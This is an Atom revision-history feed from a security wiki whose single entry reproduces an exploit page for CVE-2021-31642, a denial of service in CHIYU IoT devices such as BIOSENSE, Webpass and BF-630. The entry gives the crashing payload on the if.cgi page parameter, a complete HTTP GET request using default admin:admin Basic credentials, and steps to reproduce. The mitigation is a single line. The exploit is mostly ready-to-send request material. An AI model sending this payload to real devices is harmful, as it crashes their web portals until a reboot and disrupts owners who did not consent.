<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-31642_CHIYU_IoT_Devices_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2021-31642 CHIYU IoT Devices 拒絕服務漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-31642_CHIYU_IoT_Devices_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-31642_CHIYU_IoT_Devices_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-26T12:36:22Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2021-31642_CHIYU_IoT_Devices_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=3922&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: CHIYU IoT Devices - Denial of Service (DoS) # Date: 01/06/2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech.com/m...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-31642_CHIYU_IoT_Devices_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=3922&amp;oldid=prev"/>
		<updated>2021-06-03T11:58:51Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: CHIYU IoT Devices - Denial of Service (DoS) # Date: 01/06/2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech.com/m...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)&lt;br /&gt;
# Date: 01/06/2021&lt;br /&gt;
# Exploit Author: sirpedrotavares&lt;br /&gt;
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html&lt;br /&gt;
# Software Link: https://www.chiyu-tech.com/category-hardware.html&lt;br /&gt;
# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC   - all firmware versions &amp;lt; June 2021&lt;br /&gt;
# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC&lt;br /&gt;
# CVE: CVE-2021-31642&lt;br /&gt;
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks&lt;br /&gt;
&lt;br /&gt;
Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (&amp;gt; 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.&lt;br /&gt;
CVE ID: CVE-2021-31642&lt;br /&gt;
CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H&lt;br /&gt;
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642&lt;br /&gt;
&lt;br /&gt;
Affected parameter: page=Component: if.cgi&lt;br /&gt;
Payload:&lt;br /&gt;
if.cgi?redirect=AccLog.htm&amp;amp;failure=fail.htm&amp;amp;type=go_log_page&amp;amp;page=2781000&lt;br /&gt;
&lt;br /&gt;
====HTTP request======&lt;br /&gt;
GET&lt;br /&gt;
/if.cgi?redirect=AccLog.htm&amp;amp;failure=fail.htm&amp;amp;type=go_log_page&amp;amp;page=2781000&lt;br /&gt;
HTTP/1.1&lt;br /&gt;
Host: 127.0.0.1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)&lt;br /&gt;
Gecko/20100101 Firefox/87.0&lt;br /&gt;
Accept:&lt;br /&gt;
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;br /&gt;
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Authorization: Basic YWRtaW46YWRtaW4=&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: http://127.0.0.1/AccLog.htm&lt;br /&gt;
Cookie: fresh=&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Steps to reproduce:&lt;br /&gt;
  1. Navigate to the vulnerable device&lt;br /&gt;
  2. Make a GET request to the CGI component (if.cgi)&lt;br /&gt;
  3. Append the payload at the end of the vulnerable parameter (page)&lt;br /&gt;
  4. Submit the request and observe payload execution&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 Mitigation: The latest version of the CHIYU firmware should be installed&lt;br /&gt;
to mitigate this vulnerability.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>